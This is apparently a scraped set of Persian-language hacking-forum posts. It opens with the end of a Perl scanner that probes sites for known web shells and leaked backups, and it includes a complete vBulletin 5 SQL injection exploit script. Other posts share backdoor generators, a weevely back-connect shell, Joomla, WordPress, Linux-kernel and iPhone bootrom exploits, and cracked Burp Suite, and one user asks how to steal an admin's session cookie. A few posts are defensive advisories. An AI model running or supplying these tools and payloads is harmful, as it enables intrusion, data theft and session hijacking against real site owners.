'/images/vb.rar', '/images/admin2.asp', '/images/uploads.php', '/images/sa.php', '/images/sysadmins/', '/images/admin1/', '/images/sniper.php', '/images/images/Sym.php', '/images//r57.php', '/images/gzaa_spysl', '/images/sql-new.php', '/images//shell.php', '/images//sa.php', '/images//admin.php', '/images//sa2.php', '/images//2.php', '/images//gaza.php', '/images//up.php', '/images//upload.php', '/images//uploads.php', '/images/shell.php', '/images//amad.php', '/images//t00.php', '/images//dz.php', '/images//site.rar', '/images//Black.php', '/images//site.tar.gz', '/images//home.zip', '/images//home.rar', '/images//home.tar', '/images//home.tar.gz', '/images//forum.zip', '/images//forum.rar', '/images//forum.tar', '/images//forum.tar.gz', '/images//test.txt', '/images//ftp.txt', '/images//user.txt', '/images//site.txt', '/images//error_log', '/images//error', '/images//cpanel', '/images//awstats', '/images//site.sql', '/images//vb.sql', '/images//forum.sql', '/images/r00t-s3c.php', '/images/c.php', '/images//backup.sql', '/images//back.sql', '/images//data.sql', '/images/wp.rar/', '/images/asp.aspx', '/images/tmp/vaga.php', '/images/tmp/killer.php', '/images/whmcs.php', '/images/abuhlail.php', '/images/tmp/killer.php', '/images/tmp/domaine.pl', '/images/tmp/domaine.php', '/images/useradmin/', '/images/tmp/d0maine.php', '/images/d0maine.php', '/images/tmp/sql.php', '/images/X.php', '/images/123.php', '/images/m.php', '/images/b.php', '/images/up.php', '/images/tmp/dz1.php', '/images/dz1.php', '/images/forum.zip', '/images/Symlink.php', '/images/Symlink.pl', '/images/forum.rar', '/images/joomla.zip', '/images/joomla.rar', '/images/wp.php', '/images/buck.sql', '/includes/WSO.php', '/includes/dz.php', '/includes/DZ.php', '/includes/cpanel.php', '/includes/cpn.php', '/includes/sos.php', '/includes/term.php', '/includes/Sec-War.php', '/includes/sql.php', '/includes/ssl.php', '/includes/mysql.php', '/includes/WolF.php', '/includes/madspot.php', '/includes/Cgishell.pl', '/includes/killer.php', '/includes/changeall.php', '/includes/2.php', '/includes/Sh3ll.php', '/includes/dz0.php', '/includes/dam.php', '/includes/user.php', '/includes/dom.php', '/includes/whmcs.php', '/includes/vb.zip', '/includes/r00t.php', '/includes/c99.php', '/includes/gaza.php', '/includes/1.php', '/includes/d0mains.php', '/includes/madspotshell.php', '/includes/info.php', '/includes/egyshell.php', '/includes/Sym.php', '/includes/c22.php', '/includes/c100.php', '/includes/configuration.php', '/includes/g.php', '/includes/xx.pl', '/includes/ls.php', '/includes/Cpanel.php', '/includes/k.php', '/includes/zone-h.php', '/includes/tmp/user.php', '/includes/tmp/Sym.php', '/includes/cp.php', '/includes/tmp/madspotshell.php', '/includes/tmp/root.php', '/includes/tmp/whmcs.php', '/includes/tmp/index.php', '/includes/tmp/2.php', '/includes/tmp/dz.php', '/includes/tmp/cpn.php', '/includes/tmp/changeall.php', '/includes/tmp/Cgishell.pl', '/includes/tmp/sql.php', '/includes/0day.php', '/includes/tmp/admin.php', '/includes/L3b.php', '/includes/d.php', '/includes/tmp/d.php', '/includes/tmp/L3b.php', '/includes/sado.php', '/includes/admin1.php', '/includes/upload.php', '/includes/up.php', '/includes/vb.zip', '/includes/vb.rar', '/includes/admin2.asp', '/includes/uploads.php', '/includes/sa.php', '/includes/sysadmins/', '/includes/admin1/', '/includes/sniper.php', '/includes/images/Sym.php', '/includes//r57.php', '/includes/gzaa_spysl', '/includes/sql-new.php', '/includes//shell.php', '/includes//sa.php', '/includes//admin.php', '/includes//sa2.php', '/includes//2.php', '/includes//gaza.php', '/includes//up.php', '/includes//upload.php', '/includes//uploads.php', '/includes/shell.php', '/includes//amad.php', '/includes//t00.php', '/includes//dz.php', '/includes//site.rar', '/includes//Black.php', '/includes//site.tar.gz', '/includes//home.zip', '/includes//home.rar', '/includes//home.tar', '/includes//home.tar.gz', '/includes//forum.zip', '/includes//forum.rar', '/includes//forum.tar', '/includes//forum.tar.gz', '/includes//test.txt', '/includes//ftp.txt', '/includes//user.txt', '/includes//site.txt', '/includes//error_log', '/includes//error', '/includes//cpanel', '/includes//awstats', '/includes//site.sql', '/includes//vb.sql', '/includes//forum.sql', '/includes/r00t-s3c.php', '/includes/c.php', '/includes//backup.sql', '/includes//back.sql', '/includes//data.sql', '/includes/wp.rar/', '/includes/asp.aspx', '/includes/tmp/vaga.php', '/includes/tmp/killer.php', '/includes/whmcs.php', '/includes/abuhlail.php', '/includes/tmp/killer.php', '/includes/tmp/domaine.pl', '/includes/tmp/domaine.php', '/includes/useradmin/', '/includes/tmp/d0maine.php', '/includes/d0maine.php', '/includes/tmp/sql.php', '/includes/X.php', '/includes/123.php', '/includes/m.php', '/includes/b.php', '/includes/up.php', '/includes/tmp/dz1.php', '/includes/dz1.php', '/includes/forum.zip', '/includes/Symlink.php', '/includes/Symlink.pl', '/includes/forum.rar', '/includes/joomla.zip', '/includes/joomla.rar', '/includes/wp.php', '/includes/buck.sql', '/includes/sysadmin.php', '/includes/images/c99.php', '/includes/xd.php', '/includes/c100.php', '/includes/spy.aspx', '/includes/xd.php', '/includes/tmp/xd.php', '/includes/sym/root/home/', '/includes/billing/killer.php', '/includes/tmp/upload.php', '/includes/tmp/admin.php', '/includes/Server.php', '/includes/tmp/uploads.php', '/includes/tmp/up.php', '/includes/Server/', '/includes/wp-admin/c99.php', '/includes/tmp/priv8.php', '/includes/priv8.php', '/includes/cgi.pl/', '/includes/tmp/cgi.pl', '/includes/downloads/dom.php', '/includes/webadmin.html', '/includes/admins.php', '/includes/bluff.php', '/includes/king.jeen', '/includes/admins/', '/includes/admins.asp', '/includes/admins.php', '/includes/wp.zip', '/includes/', '/templates/rhuk_milkyway/WSO.php', '/templates/rhuk_milkyway/dz.php', '/templates/rhuk_milkyway/DZ.php', '/templates/rhuk_milkyway/cpanel.php', '/templates/rhuk_milkyway/cpn.php', '/templates/rhuk_milkyway/sos.php', '/templates/rhuk_milkyway/term.php', '/templates/rhuk_milkyway/Sec-War.php', '/templates/rhuk_milkyway/sql.php', '/templates/rhuk_milkyway/ssl.php', '/templates/rhuk_milkyway/mysql.php', '/templates/rhuk_milkyway/WolF.php', '/templates/rhuk_milkyway/madspot.php', '/templates/rhuk_milkyway/Cgishell.pl', '/templates/rhuk_milkyway/killer.php', '/templates/rhuk_milkyway/changeall.php', '/templates/rhuk_milkyway/2.php', '/templates/rhuk_milkyway/Sh3ll.php', '/templates/rhuk_milkyway/dz0.php', '/templates/rhuk_milkyway/dam.php', '/templates/rhuk_milkyway/user.php', '/templates/rhuk_milkyway/dom.php', '/templates/rhuk_milkyway/whmcs.php', '/templates/rhuk_milkyway/vb.zip', '/templates/rhuk_milkyway/r00t.php', '/templates/rhuk_milkyway/c99.php', '/templates/rhuk_milkyway/gaza.php', '/templates/rhuk_milkyway/1.php', '/templates/rhuk_milkyway/d0mains.php', '/templates/rhuk_milkyway/madspotshell.php', '/templates/rhuk_milkyway/info.php', '/templates/rhuk_milkyway/egyshell.php', '/templates/rhuk_milkyway/Sym.php', '/templates/rhuk_milkyway/c22.php', '/templates/rhuk_milkyway/c100.php', '/templates/rhuk_milkyway/configuration.php', '/templates/rhuk_milkyway/g.php', '/templates/rhuk_milkyway/xx.pl', '/templates/rhuk_milkyway/ls.php', '/templates/rhuk_milkyway/Cpanel.php', '/templates/rhuk_milkyway/k.php', '/templates/rhuk_milkyway/zone-h.php', '/templates/rhuk_milkyway/tmp/user.php', '/templates/rhuk_milkyway/tmp/Sym.php', '/templates/rhuk_milkyway/cp.php', '/templates/rhuk_milkyway/tmp/madspotshell.php', '/templates/rhuk_milkyway/tmp/root.php', '/templates/rhuk_milkyway/tmp/whmcs.php', '/templates/rhuk_milkyway/tmp/index.php', '/templates/rhuk_milkyway/tmp/2.php', '/templates/rhuk_milkyway/tmp/dz.php', '/templates/rhuk_milkyway/tmp/cpn.php', '/templates/rhuk_milkyway/tmp/changeall.php', '/templates/rhuk_milkyway/tmp/Cgishell.pl', '/templates/rhuk_milkyway/tmp/sql.php', '/templates/rhuk_milkyway/0day.php', '/templates/rhuk_milkyway/tmp/admin.php', '/templates/rhuk_milkyway/L3b.php', '/templates/rhuk_milkyway/d.php', '/templates/rhuk_milkyway/tmp/d.php', '/templates/rhuk_milkyway/tmp/L3b.php', '/templates/rhuk_milkyway/sado.php', '/templates/rhuk_milkyway/admin1.php', '/templates/rhuk_milkyway/upload.php', '/templates/rhuk_milkyway/up.php', '/templates/rhuk_milkyway/vb.zip', '/templates/rhuk_milkyway/vb.rar', '/templates/rhuk_milkyway/admin2.asp', '/templates/rhuk_milkyway/uploads.php', '/templates/rhuk_milkyway/sa.php', '/templates/rhuk_milkyway/sysadmins/', '/templates/rhuk_milkyway/admin1/', '/templates/rhuk_milkyway/sniper.php', '/templates/rhuk_milkyway/images/Sym.php', '/templates/rhuk_milkyway//r57.php', '/templates/rhuk_milkyway/gzaa_spysl', '/templates/rhuk_milkyway/sql-new.php', '/templates/rhuk_milkyway//shell.php', '/templates/rhuk_milkyway//sa.php', '/templates/rhuk_milkyway//admin.php', '/templates/rhuk_milkyway//sa2.php', '/templates/rhuk_milkyway//2.php', '/templates/rhuk_milkyway//gaza.php', '/templates/rhuk_milkyway//up.php', '/templates/rhuk_milkyway//upload.php', '/templates/rhuk_milkyway//uploads.php', '/templates/rhuk_milkyway/shell.php', '/templates/rhuk_milkyway//amad.php', '/templates/rhuk_milkyway//t00.php', '/templates/rhuk_milkyway//dz.php', '/templates/rhuk_milkyway//site.rar', '/templates/rhuk_milkyway//Black.php', '/templates/rhuk_milkyway//site.tar.gz', '/templates/rhuk_milkyway//home.zip', '/templates/rhuk_milkyway//home.rar', '/templates/rhuk_milkyway//home.tar', '/templates/rhuk_milkyway//home.tar.gz', '/templates/rhuk_milkyway//forum.zip', '/templates/rhuk_milkyway//forum.rar', '/templates/rhuk_milkyway//forum.tar', '/templates/rhuk_milkyway//forum.tar.gz', '/templates/rhuk_milkyway//test.txt', '/templates/rhuk_milkyway//ftp.txt', '/templates/rhuk_milkyway//user.txt', '/templates/rhuk_milkyway//site.txt', '/templates/rhuk_milkyway//error_log', '/templates/rhuk_milkyway//error', '/templates/rhuk_milkyway//cpanel', '/templates/rhuk_milkyway//awstats', '/templates/rhuk_milkyway//site.sql', '/templates/rhuk_milkyway//vb.sql', '/templates/rhuk_milkyway//forum.sql', '/templates/rhuk_milkyway/r00t-s3c.php', '/templates/rhuk_milkyway/c.php', '/templates/rhuk_milkyway//backup.sql', '/templates/rhuk_milkyway//back.sql', '/templates/rhuk_milkyway//data.sql', '/templates/rhuk_milkyway/wp.rar/', '/templates/rhuk_milkyway/asp.aspx', '/templates/rhuk_milkyway/tmp/vaga.php', '/templates/rhuk_milkyway/tmp/killer.php', '/templates/rhuk_milkyway/whmcs.php', '/templates/rhuk_milkyway/abuhlail.php', '/templates/rhuk_milkyway/tmp/killer.php', '/templates/rhuk_milkyway/tmp/domaine.pl', '/templates/rhuk_milkyway/tmp/domaine.php', '/templates/rhuk_milkyway/useradmin/', '/templates/rhuk_milkyway/tmp/d0maine.php', '/templates/rhuk_milkyway/d0maine.php', '/templates/rhuk_milkyway/tmp/sql.php', '/templates/rhuk_milkyway/X.php', '/templates/rhuk_milkyway/123.php', '/templates/rhuk_milkyway/m.php', '/templates/rhuk_milkyway/b.php', '/templates/rhuk_milkyway/up.php', '/templates/rhuk_milkyway/tmp/dz1.php', '/templates/rhuk_milkyway/dz1.php', '/templates/rhuk_milkyway/forum.zip', '/templates/rhuk_milkyway/Symlink.php', '/templates/rhuk_milkyway/Symlink.pl', '/templates/rhuk_milkyway/forum.rar', '/templates/rhuk_milkyway/joomla.zip', '/templates/rhuk_milkyway/joomla.rar', '/templates/rhuk_milkyway/wp.php', '/templates/rhuk_milkyway/buck.sql', '/templates/rhuk_milkyway/sysadmin.php', '/templates/rhuk_milkyway/images/c99.php', '/templates/rhuk_milkyway/xd.php', '/templates/rhuk_milkyway/c100.php', '/templates/rhuk_milkyway/spy.aspx', '/templates/rhuk_milkyway/xd.php', '/templates/rhuk_milkyway/tmp/xd.php', '/templates/rhuk_milkyway/sym/root/home/', '/templates/rhuk_milkyway/billing/killer.php', '/templates/rhuk_milkyway/tmp/upload.php', '/templates/rhuk_milkyway/tmp/admin.php', '/templates/rhuk_milkyway/Server.php', '/templates/rhuk_milkyway/tmp/uploads.php', '/templates/rhuk_milkyway/tmp/up.php', '/templates/rhuk_milkyway/Server/', '/templates/rhuk_milkyway/wp-admin/c99.php', '/templates/rhuk_milkyway/tmp/priv8.php', '/templates/rhuk_milkyway/priv8.php', '/templates/rhuk_milkyway/cgi.pl/', '/templates/rhuk_milkyway/tmp/cgi.pl', '/templates/rhuk_milkyway/downloads/dom.php', '/templates/rhuk_milkyway/webadmin.html', '/templates/rhuk_milkyway/admins.php', '/templates/rhuk_milkyway/bluff.php', '/templates/rhuk_milkyway/king.jeen', '/templates/rhuk_milkyway/admins/', '/templates/rhuk_milkyway/admins.asp', '/templates/rhuk_milkyway/admins.php', '/templates/rhuk_milkyway/wp.zip', '/templates/rhuk_milkyway/','WSO.php', 'a.php', 'z.php', 'e.php', 'r.php', 't.php', 'y.php', 'u.php', 'i.php', 'o.php', 'p.php', 'q.php', 's.php', 'd.php', 'f.php', 'g.php', 'h.php', 'j.php', 'k.php', 'l.php', 'm.php', 'w.php', 'x.php', 'c.php', 'v.php', 'b.php', 'n.php', '1.php', '2.php', '3.php', '4.php', '5.php', '6.php', '7.php', '8.php', '9.php', '10.php', '12.php', '11.php', '1234.php',); foreach $com(@path){ $url = $site.$com; $req = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($req); if ($response->is_success){ print "$com\n"; $url = substr($url, $com + 13); $com = substr($url, 0, index($url, '"')); open (txt,">>done.txt"); print txt $com,"\n"; close(txt); print "=> Dir Found : $url\n"; } else { print "=> Not Found : $com\n"; } }}

پایتون 3 (این اسکریپت درب پشتی برای ویندوز و لینوکس ایجاد میکنه) BackHAck-master.zip

به نام خدا موضوع بحث از نام تاپیک مشخص هست اما زیاد خاص نیست اما جدیدا زیاد برخورد کردم گفتم شما هم آشنا بشید فایل ویدیو پیوست شد Sqli.rar

خدمت شما دوستان CHFI Course https://mega.nz/#F!agNzmI6K!GZ-xGdr1sN8OD1cWZCZcuw ------- Penetration Testing Course https://mega.nz/#F!j98H2KCZ!Vt2U0kZGV3U8vvUTLDpc2Q -------- Pearson Certification - CISSP Video Course https://mega.nz/#F!VFEzTQhL!MbL40EgnL5rnrlFI0uOGOg -------- Complete Wireshark Course https://mega.nz/#F!MYc1hAzB!jEDXV9BJwxiQnkAbn2aj9Q ------------- CBT Nuggets (CEHv10) https://mega.nz/#F!hE0jVSLL!E0BqZNymd8GiaNLwXM8XaQ ---------------------------- All Python Course https://mega.nz/#F!oBF3waBI!c3tJXdpSlb8J6Dfvx1o3IQ ------------- Networking Course https://mega.nz/#F!YBNDyYbS!IEp1-AeBFwHV8N34l0wptw

با سلام و درود فراوان به اعضای انجمن . در این تاپیک به صورت تصویری اموزش اکسپلویت اسیب پذیری های لوکال و ریموت اسیب پذیری های بافر اورفلو قرار میگیرد و سعی میشود به صورت هفتگی یک اموزش قرار میگیرد . سر فصل ها : کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی (لوکال) کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی 2 ( ریموت) کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی و بایپس SEH در برنامه (لوکال) کشف اسیب پذیری و اکسپلویت اسیب پذیری در برنامه ی ویندوزی و بایپس DEP و ASLR (لوکال و ریموت) و .... سرفصل به مرور زمان اپدیت میشود ! و اما پیشنیاز های این اموزش ها : درک کامل از CPU و Memory و نحوه کار آن یک ماشین مجازی ویندوز XP یا 7 (میتواند سیستم عامل اصلی باشد و ماشین کالی به صورت مجازی باشد در هر حال توصیه نمیشود) اشنایی با یکی از زبان های Perl , Python , PHP اشنایی با دیباگر ها ( Ollydbg یا Immunity Debugger)

به نام خدا حمله‌ی Prototype Pollution در جاواسکریپت هر Objectی در جاواسکریپت یک مشخصه (property) نهان به اسم __proto__ داره. وقتی به مستنداتش: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto مراجعه می‌کنیم اکیدا توصیه شده که دیگه بیخیال این feature در جاواسکریپت شیم و تا الان هم به دلایل سازگاری نیگرش داشتند. کار این مشخصه اینه که در یک کلام دسترسی داشته باشه! (نقش set کننده و get کننده‌ی مشخصه‌ها رو داره!) حتی این مشخصه‌هه به شکلیه که شما می‌تونید یک آبجکت دیگه رو به کل درون یک آبجکت تعریف/تنظیم کنید (اسلاید شماره ۱۰). حالا درون این به‌هم‌ریختگی یه قابلیت دیگه هم وجود داره که شما می‌تونید توی prototype تون مشخصه تعریف کنید! ببینید: obj1.prototype.iscg = true[/b][/center] [b] [center]let obj1 = {} obj1.iscg //true حالا به جایiscg بذارید isAdmin یا هر مشخصه‌ی دیگه‌ای که می‌تونید بهش مقدار دلخواه بدین و در context های مختلف ازش استفاده کنید. به این عمل می‌گن prototype pollution. به همین راحتی. حالا توی این حمله که به Kibana انجام شده یه محقق خلاق اومده یه آبجکت از یه صفحه‌ی دیگه رو که تابع eval رو اجرا می‌کرده دستکاری و آبجکت خودش رو درش تزریق کرده که باعث RCE شده. متن کامل مقاله: https://slides.com/securitymb/prototype-pollution-in-kibana

با سلام امروز یک اکسپلویت برای سیستم مدیریت محتوا محبوب جوملا پابلیک شده که سطح این اسیب پذیری بسیار خطرناک هستش بنده چندین سایت حتی سایت ایرانی رو چک کردم و متاسفانه اکثر سایت های ایرانی که تست شده بهش آسیب پذیر هستن این اسیب پذیری به نفوذ گر به راحتی دسترسی از راه دور رو میده و بر روی ورژن های 3.0.0 تا 3.4.6 جواب میده! اکسپلویت رو برای برسی میتونید از گیت هاب زیر مشاهده کنید لینک گیت هاب: Github سو استفاده از اکسپلویت بر عهده خود شماست

به نام خدا با سلام، Bootroom یا SecureROM روی دستگاه‌های شرکت اپل، اولین کد مهمیه که روی هر کدومشون اجرا می‌شه. Bootroom فقط خواندنیه و پیدا شدن آسیب‌پذیری روش انقدر مهم و بحرانیه که اپل هیچوقت نمی‌تونه اونو پچ کنه. تنها راهش جایگزین شدن سخت‌افزاره! اکسپلویتی که امروز منتشر شد از Bootroom آیفون 4S تا آیفون 8 رو در بر می‌گیره! آسیب‌پذیری این Bootroomها از نوع Race Condition هست و اکسپلویتی که منتشر شده بخاطر جنبه‌ی حیاتی‌ای که داره، ترجیح داده شده که Full Jailbreak نباشه. ولی این امکان برای محقق وجود داره که SecureRom رو دامپ کنه، رمزنگاری فایل سیستم اپل (keybag)‌ رو رمزگشایی کنه و در نهایت امکان بهره‌گیری از JTAG رو روی دستگاه به قصد دسترسی مستقیم به حافظه دستگاه (DMA)‌ فراهم کنه. این بنده‌ی خدایی که این آسیب‌پذیری رو کشف کرده میگه موقعی که اپل نسخه‌ی بتا iOS ۱۲ رو ریلیز کرده، یه آسیب‌پذیری UAF روی کد iBoot USB رو پچ کرده که از راه دور قابل اکسپلویت نبوده و نیاز به دسترسی فیزیکی به دستگاه داشته. اینطوری بوده که با تحلیل اون، این آسیب‌پذیری کشف شده. آخرین اکسپلویتی که از Bootroom تاحالا کشف شده مربوط به iPhone 4 به قبل بوده! حالا با این اکسپلویت متاسفانه همه به راحتی می‌تونن هر دستگاه آیفونی رو Jailbreak کنن. هکرها، پلیس‌ها، دزدها، دولت‌ها و... هم می‌تونن با این اکسپلویت گوشی شما رو Jailbreak و تمام اطلاعاتتون رو در اختیار داشته باشند. می‌تونید از این لینک به این اکسپلویت دسترسی داشته باشید. Github: (https://github.com/axi0mX/ipwndfu) منبع:آفسک

Usage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM #!/usr/bin/perl[/color][/left] [color=#000000] [left]use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; use MIME::Base64; system $^O eq 'MSWin32' ? 'cls' : 'clear'; print " +===================================================+ | vBulletin 5 Beta XX SQLi 0day | +===================================================+ "; if (@ARGV != 5) { print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n"; exit; } $host = $ARGV[0]; $path = $ARGV[1]; $username = $ARGV[2]; $password = $ARGV[3]; $magicnum = $ARGV[4]; $encpath = encode_base64('http://'.$host.$path); print "[+] Logging\n"; print "[+] Username: ".$username."\n"; print "[+] Password: ".$password."\n"; print "[+] MagicNum: ".$magicnum."\n"; print "[+] " .$host.$path."auth/login\n"; my $browser = LWP::UserAgent->new; my $cookie_jar = HTTP::Cookies->new; my $response = $browser->post( 'http://'.$host.$path.'auth/login', [ 'url' => $encpath, 'username' => $username, 'password' => $password, ], Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'', User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0', ); $browser->cookie_jar( $cookie_jar ); my $browser = LWP::UserAgent->new; $browser->cookie_jar( $cookie_jar ); print "[+] Requesting\n"; my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote', [ 'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338', ], User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0', ); $data = $response->content; if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 }; print "\n"; exit 1;

با سلام خدمت کاربران عزیز تیم امنیتی ایران سایبر خیلی خوشحال هستم که در خدمت شما عزیزان هستم در این دوره با مباحث امنیتی به صورت کامل و عملی آشنا میشویم کسانی که به حوزه ی امنیت و هکینگ علاقه مند هستند و تازه میخوان شروع کنند این دوره بسیار مناسب آنهاست سطح این دوره مقدماتی و متوسط می باشد تمام آموزش ها با صدا و زبان فارسی ارائه شده و توسط بنده ضبط شده است روزانه چند قسمت قرار میگیرد و فایل ها در انجمن پیوست میشود دوستانی که سوالی ، پیشنهاد و انتقادی دارند کافیست به بنده در پ خ پیام بدهند امیدوارم که از این دوره لذت ببرید

درود در این قسمت میخوام ابزار های دوزینگ رو براتون قرار بدم 0.سوال ممنوع

همانطور که میدانید اولین مرحله در هکینگ و تست نفوذ پیدا کردن اطلاعات کامل از هدف میباشد که اصطلاحاً به این کار Foot Printing میگوییم . یکی از عمده مراحل footprinting شناسایی سیستم عامل هدف است که ما میتوانیم بر اساس سیستم عامل سرور حملات خودمونو اجرا کنیم . روش اول : با استفاده از ping ما با استفاده از این روش میتوانیم خیلی راحت نوع سیستم عامل را به دست بیاریم . دستور ping iran-cyber.net اگر TTL دستور ما کم تر 64 بود سیستم عامل لینوکسی است اگر TTL دستور بین 64 تا 128 باشد سیستم عامل ویندوزی است و اگر بیشتر از 128 باشد سیستم عامل متفرقه میباشد . مشکلی که این کار دارد میتواند ما را به دام بیندازد چون رد پایی از خودمون به جا میگذاریم ؛ از روش های دیگه ای مانند سایت های آنلاین هم میتوانیم بهره بگیریم دو سایت زیر میتوانند علاوه بر سیستم عامل مصرفی تارگت اطلاعات دیگری مثل ایپی ، اطلاعات SSL ، وب سرور ، تکنلوژی های به کار رفته در صفحه وب و... را به ما بدهند . https://toolbar.netcraft.com https://www.shodan.io همچنین ما میتوانیم از ابزار NMAP کمک بگیریم

سلام خدمت دوستان و کابران گرامی در این تاپیک به موضوع جلوگیری حملات بروت فورس در cms های مختلف میپردازیم اگه سوالی بود پ خ لطفا دوستان قبلا از ارسال پست قوانین انجمن مطالعه کنند باتشکر

با سلام خدمت دوستان عزیز آخرین ورژن ابزار Burp Suite برای عزیزان پیوست کردم دوستان که سوال یا مشکلاتی برخورد کردن در این تایپک سوالات پاسخ داده خواهد شد ./ : Burp Suite contains the following key components An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application An application-aware Spider, for crawling content and functionality An advanced web application Scanner, for automating the detection of numerous types of vulnerability An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities A Repeater tool, for manipulating and resending individual requests A Sequencer tool, for testing the randomness of session tokens The ability to save your work and resume working later - Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp. burpsuite_pro_v1.7.30_JK.zip

سلام و درود این آموزش مخصوص کسانی هست که میخوان بدون باز کردن پورت از سرور دسترسی BackConnect بگیرند. لینک اسکریپت: کلیک کنید weevely.rar

به نام ایزد یکتا چند وقتی فعالیت کم بود و دیگه وقتش رسیده به انجمن روح تازه ای بدیم و دوباره شروع کنیم تو این دوره بهتون یاد میدم چطوری به یک سایت وردپرسی تست نفوذ انجام بدید و سایت رو از لحاظ امنیتی برسی کنید ابتدا ما تارگتی را مشخص میکنیم و سعی میکنیم اطلاعات مفیدی از آن جمع کنیم تا با زدن انواع مانور به سایت نفوذ کنیم. (توجه داشته باشید ما نمی خواهیم روی سرور تست انجام بدیم فقط تارگت مشخص شده) سعی میکنم کل این آموزش رو توی یک ویدیو خلاصه کنم این آموزش جنبه آموزشی داره و هرگونه سوءاستفاده بر عهده شخص متخلف است

محققین امنیتی یک آسیب پذیری جدید از نوع integer overflow در هسته لینوکس کشف کردن که به Mutagen Astronomy مشهور است و بر روی توزیع های Debian , Red Hat , CentOS تاثیر می گذارد این آسیب پذیری میتواند توسط یک کاربر عادی مورد سوء استفاده قرار بگیرد تا دسترسی کاربر عادی را به روت (root) یعنی اخرین سطح دسترسی تغییر دهد شما در پایین میتوانید 2 اکسپلویت پابلیک شده در چند روز اخیر برای این اسیب پذیری را مشاهده کنید باید توجه کنید که این آسیب پذیری فقط روی نسخه هایی کار می کند که از معماری 64Bit در حال استفاده باشند و حداقل رم نیاز برای اجرا شدن اکسپلویت 32 GB است. این آسیب پذیری برای هسته های بین ژوئیه 2007 تا ژوئیه 2017 منتشر شده است نسخه های هسته لینوکس آسیب پذیر به Mutagen Astronomy را در زیر مشاهده خواید کرد 2.6.x 3.10.x 4.14.x آسیب پذیری Mutagen Astronomy در تابع create_elf_tables در هسته لینوکس به وجود آمده است این تابع برای مدیریت جداول حافظه استفاده می شود. poc-exploit.zip poc-suidbin.zip

اسکپلویت تحت وبو چطور اجراکنم دوستان به طور کلی میخوام یاد بگیرم

اکسپلویتی برای آسیب پذیری اخیر وردپرس نسخه 4.9.6 نوشته بودم که بنا به درخواست دوستان امروز با همه کاربران به اشتراک میزارم برای اطلاعات بیشتر از آسیب پذیری اینجا کلیک کنید [MEDIA=aparat]PdbQy[/MEDIA] لینک دانلود اکسپلویت https://github.com/04x/Wp-Arbitrary-File-Deletion-Exploit-/ این آسیب پذیری در نسخه 4.9.7 رفع شده است اگر هنوز وردپرس خود را آپدیت نکردید سریعا اقدام کنید موفق و پیروز باشید

به نام خداوند بخشنده مهربان سلام و عرض ادب خدمت کاربران عزیز در تاریخ 8/22/2018 گذارشی دریافت شد از حملات جدید هکر ها به افزونه محبوب Ultimate Member وردپرس اگر شما از این افزونه در حال استفاده هستید به سرعت افزونه خود را آپدیت کنید و لاگ مربوط به IP ادرس زیر را برسی کنید 185.177.59.23 برای اطلاعات بیشتر میتوانید از سایت sucuri استفاده کنید بیش از 100,000 نفر درحال استفاده از این افزونه هستند به امید بستری ایمن تر برای کاربران

سلام خدمت دوستان عزیز دوستان بنده میخوام PHPSESSID ادمین یک سایت رو بدست بیارم و متاسفانه اون سایت باگ xss رو نداره خواستم بپرسم برای اینکه بتونم این سشن رو ازش بگیریم ایا میشه لینکی یا فایلی برای این شخص فرستاد و این سشن رو ازش گرفت یا خیر ؟ یک مثال بزنم دوستان بهتر متوجه بشن این سایت یا همون تارگتی که قصد نفوذ بهش رو دارم با php نوشته شده پس این کوکی به این صورت ایجاد شده session_start() خب خروجی این یه دونه نام کوکی هست و یه دونه اون id هستش بصورت زیر: PHPSESSID=nb714i2v97glpcn3oi85rvbas0 که نامش میشه همون : PHPSESSID و ID میشه :nb714i2v97glpcn3oi85rvbas0 و همونطور که دوستان اطلاع دارن این کوکی رو میشه تو مرورگر خودمون بسادگی تو بخش NETWORK مرورگر و در سربرگ COOKIES مشاهده کرد. حالا سوال اینجا که چطوری میتونم این کوکی رو که تو بخش NETWORK مرورگر قبانی ذخیره هستش رو بدست بیارم. تصور من اینکه یک فایل PHP که بر روی یک هاست اپلود شده به این شخص ارسال کنم و با باز کردن اون فایل تحت مرورگر این کوکی رو از بخش نتورک در یک فایل قرار بده و در اون هاست اپلود کنه ؟ ایا هم چه چیزی امکان پذیر هست ؟ ایا اسکریپتی جهت انجام اینکار کسی سراغ داره ؟